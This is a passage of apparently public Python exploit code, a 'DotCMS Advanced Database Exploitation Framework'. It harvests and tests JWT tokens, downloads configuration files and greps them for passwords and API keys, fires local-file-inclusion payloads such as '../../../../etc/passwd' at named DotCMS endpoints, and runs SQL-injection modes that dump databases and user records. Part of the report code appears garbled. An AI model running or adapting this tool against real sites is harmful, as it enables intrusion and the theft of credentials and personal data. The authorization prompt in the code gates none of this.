found_tokens.extend(tokens) except: pass if found_tokens: found_tokens = list(set(found_tokens)) # Remove duplicates self.save_extracted_data('jwt_tokens', found_tokens) self.stats['tokens_found'] = len(found_tokens) return found_tokens def validate_jwt(self, token): """Validate JWT token""" # Basic format check parts = token.split('.') if len(parts) != 3: return False # Try to use token headers = {'Authorization': f'Bearer {token}'} test_urls = [ '/api/v1/users/current', '/api/v1/sites', '/dotAdmin/' ] for endpoint in test_urls: url = urljoin(self.target, endpoint) try: response = self.session.get(url, headers=headers, timeout=10) if response.status_code == 200: return True except: continue return False def save_extracted_data(self, data_type, data): """Save extracted data to file""" filename = f"{self.results_dir}/{data_type}.json" with open(filename, 'w', encoding='utf-8') as f: json.dump(data, f, indent=2, default=str) self.log(f"[+] Data saved to {filename}", 'success') def dump_configuration(self): """Dump configuration files""" self.log("\n[*] Dumping configuration files...", 'info') config_files = [ '/.env', '/config.json', '/configuration.json', '/web.config', '/server-config.xml', '/dotcms-config.xml', '/WEB-INF/web.xml', '/META-INF/context.xml' ] leaked_files = [] for config_file in config_files: url = urljoin(self.target, config_file) try: response = self.session.get(url, timeout=10) if response.status_code == 200 and len(response.text) > 10: self.log(f"[+] Found config file: {config_file}", 'success') # Save file safe_name = config_file.replace('/', '_').replace('.', '_') file_path = f"{self.results_dir}/config_{safe_name}.txt" with open(file_path, 'w', encoding='utf-8') as f: f.write(response.text) leaked_files.append({ 'file': config_file, 'url': url, 'size': len(response.text), 'saved_as': file_path }) self.stats['files_leaked'] += 1 # Check for sensitive info sensitive_patterns = [ r'password\s*[:=]\s*[\'"]?([^\'"\s]+)', r'secret\s*[:=]\s*[\'"]?([^\'"\s]+)', r'api[_-]?key\s*[:=]\s*[\'"]?([^\'"\s]+)', r'database.*password', r'jwt.*secret' ] for pattern in sensitive_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: self.log(f"[!] Sensitive data found in {config_file}: {matches[:3]}", 'critical') except Exception as e: continue return leaked_files def check_file_inclusion(self): """Check for file inclusion vulnerabilities""" self.log("\n[*] Checking for file inclusion vulnerabilities...", 'info') lfi_payloads = [ '../../../../etc/passwd', '../../../../windows/win.ini', '../../../../WEB-INF/web.xml', '../../../../proc/self/environ', 'file:///etc/passwd', '....//....//....//etc/passwd' ] vulnerable_endpoints = [ '/api/v1/download', '/dotAdmin/download', '/html/portlet/ext/contentlet/field_validation.jsp', '/c/download' ] found_lfi = [] for endpoint in vulnerable_endpoints: for payload in lfi_payloads: url = urljoin(self.target, endpoint) params = {'file': payload, 'filename': payload} try: response = self.session.get(url, params=params, timeout=10) # Check for LFI indicators indicators = ['root:', '[fonts]', ' 0 else "HIGH"} """ # Database specific findings if db_results: report += f""" DATABASE FINDINGS {'-'*80} Database Type: {db_results.get('database_info', {}).get('type', 'Unknown')} Tables Discovered: {len(db_results.get('tables', []))} Tables Dumped: {len(db_results.get('dumped_data', {}))} Sensitive Columns: {len(db_results.get('sensitive_columns', {}))} Cleartext Passwords/Data: {len(db_results.get('cleartext_data', {}))} """ report += f""" DETAILED FINDINGS {'-'*80} 1. SQL INJECTION VULNERABILITIES: {len(sqli_vulns)} """ for i, vuln in enumerate(sqli_vulns, 1): report += f" {i}. Endpoint: {vuln.get('endpoint', 'N/A')}\n" report += f" Type: {vuln.get('type', 'N/A')}\n" if 'delay' in vuln: report += f" Delay: {vuln['delay']} seconds\n" report += f" Payload: {vuln.get('payload', 'N/A')[:50]}...\n" # Database findings if db_results and db_results.get('tables'): report += f""" 2. DATABASE ENUMERATION RESULTS """ for i, table in enumerate(db_results.get('tables', [])[:10], 1): report += f" {i}. Table: {table}\n" if db_results.get('dumped_data'): report += f"\n Data dumped from {len(db_results['dumped_data'])} tables\n" if db_results.get('cleartext_data'): report += f" Cleartext data found in {len(db_results['cleartext_data'])} columns\n" report += f""" 3. USER DATA EXPOSED: {len(users)} """ for i, user in enumerate(users[:5], 1): report += f" {i}. Email: {user.get('email', 'N/A')}\n" report += f""" 4. JWT TOKENS FOUND: {len(tokens)} """ for i, token in enumerate(tokens[:3], 1): report += f" {i}. Token: {token[:30]}...\n" report += f""" 5. CONFIGURATION FILES: {len(configs)} """ for i, config in enumerate(configs[:3], 1): report += f" {i}. File: {config.get('file', 'N/A')}\n" report += f""" 6. LFI VULNERABILITIES: {len(lfi_vulns)} """ for i, lfi in enumerate(lfi_vulns, 1): report += f" {i}. Endpoint: {lfi.get('endpoint', 'N/A')}\n" report += f" Payload: {lfi.get('payload', 'N/A')}\n" report += f""" RECOMMENDATIONS {'-'*80} 1. IMMEDIATE: Patch all SQL injection vulnerabilities 2. Encrypt all database fields containing sensitive data 3. Implement proper input validation and parameterized queries 4. Rotate all exposed credentials and JWT tokens 5. Implement database activity monitoring 6. Restrict access to configuration files 7. Conduct comprehensive security audit 8. Implement Web Application Firewall (WAF) EVIDENCE LOCATION {'-'*80} Evidence Database: {self.evidence.evidence_db} Results Directory: {self.results_dir} Database Dumps: {self.results_dir}/dump_*.json Full Database Report: {self.results_dir}/database_penetration_report.txt Log File: {self.results_dir}/execution.log {'='*80} END OF REPORT {'='*80} """ report_file = f"{self.results_dir}/penetration_test_report.txt" with open(report_file, 'w', encoding='utf-8') as f: f.write(report) self.log(f"[+] Report generated: {report_file}", 'success') print(f"\n{Fore.GREEN}{report[:2000]}...{Style.RESET_ALL}") def show_statistics(self): """Show execution statistics""" stats_text = f""" {'='*80} EXPLOITATION STATISTICS {'='*80} Vulnerabilities Found: {self.stats['vulnerabilities']} Database Tables Enumerated: {self.stats['tables_enumerated']} Database Records Dumped: {self.stats['records_dumped']} Users Extracted: {self.stats['users_extracted']} JWT Tokens Found: {self.stats['tokens_found']} Files Leaked: {self.stats['files_leaked']} DIRECTORIES CREATED {'-'*80} Evidence Directory: {self.evidence.evidence_dir} Results Directory: {self.results_dir} Database Dumps: {self.results_dir}/dump_*.{json,csv} NEXT STEPS {'-'*80} 1. Review database dumps in: {self.results_dir}/dump_*.json 2. Check cleartext data in: {self.results_dir}/cleartext_search.json 3. See database report: {self.results_dir}/database_penetration_report.txt 4. Present critical findings to security team immediately {'='*80} """ print(f"{Fore.CYAN}{stats_text}{Style.RESET_ALL}") def main(): """Main function""" banner = r""" ██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗ ██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗ ██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║ ██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║ ██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ Advanced Database Exploitation Framework Authorized testing only! """ parser = argparse.ArgumentParser( description='DotCMS Advanced Database Exploitation Framework', formatter_class=argparse.RawDescriptionHelpFormatter, epilog=''' Examples: %(prog)s -t https://target.com:8443 --database %(prog)s --target http://localhost:8080 --full Modes: --database : Perform database enumeration and dump only --full : Complete exploitation including database --quick : Quick scan without heavy operations Legal Notice: This tool is for authorized penetration testing only. Unauthorized use is illegal and unethical. ''' ) parser.add_argument('-t', '--target', required=True, help='Target URL (e.g., https://target.com:8443)') parser.add_argument('--database', action='store_true', help='Database enumeration and dump only') parser.add_argument('--full', action='store_true', help='Complete exploitation (including database)') parser.add_argument('--quick', action='store_true', help='Quick scan only') args = parser.parse_args() print(f"{Fore.RED}{banner}{Style.RESET_ALL}") # Confirm authorization response = input(f"{Fore.YELLOW}[?] Do you have explicit permission to test {args.target}? (yes/NO): {Style.RESET_ALL}") if response.lower() != 'yes': print(f"{Fore.RED}[!] Operation cancelled. Unauthorized access is illegal.{Style.RESET_ALL}") sys.exit(1) # Run exploitation try: exploit = DotCMSExploiter(args.target) if args.database: # Database-only mode exploit.log("[*] Running database exploitation only...", 'info') sqli_vulns = exploit.enhanced_sqli_testing() if sqli_vulns: exploit.run_database_exploitation(sqli_vulns[0].get('endpoint')) else: exploit.log("[-] No SQL injection found for database exploitation", 'error') elif args.full: # Full exploitation including database exploit.run_full_exploitation() elif args.quick: # Quick mode exploit.log("[*] Running quick scan...", 'info') exploit.check_tls() sqli_vulns = exploit.enhanced_sqli_testing() if sqli_vulns: exploit.extract_users_comprehensive(sqli_vulns[0].get('endpoint')) exploit.generate_comprehensive_report(sqli_vulns or [], [], [], [], []) else: # Interactive mode print(f"\n{Fore.CYAN}Select operation mode:{Style.RESET_ALL}") print(f"1. Full exploitation (including database)") print(f"2. Database enumeration only") print(f"3. Quick vulnerability scan") choice = input(f"\n{Fore.YELLOW}Select option (1-3): {Style.RESET_ALL}") if choice == '1': exploit.run_full_exploitation() elif choice == '2': sqli_vulns = exploit.enhanced_sqli_testing() if sqli_vulns: exploit.run_database_exploitation(sqli_vulns[0].get('endpoint')) else: exploit.log("[-] No SQL injection found", 'error') elif choice == '3': exploit.check_tls() sqli_vulns = exploit.enhanced_sqli_testing() if sqli_vulns: exploit.extract_users_comprehensive(sqli_vulns[0].get('endpoint')) exploit.generate_comprehensive_report(sqli_vulns or [], [], [], [], []) else: exploit.log("[*] Running full exploitation by default", 'info') exploit.run_full_exploitation() except KeyboardInterrupt: print(f"\n{Fore.YELLOW}[!] Scan interrupted by user{Style.RESET_ALL}") except Exception as e: print(f"{Fore.RED}[!] Critical error: {str(e)}{Style.RESET_ALL}") import traceback traceback.print_exc() if __name__ == '__main__': # Fix Windows asyncio event loop policy if sys.platform == 'win32': asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy()) main() Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================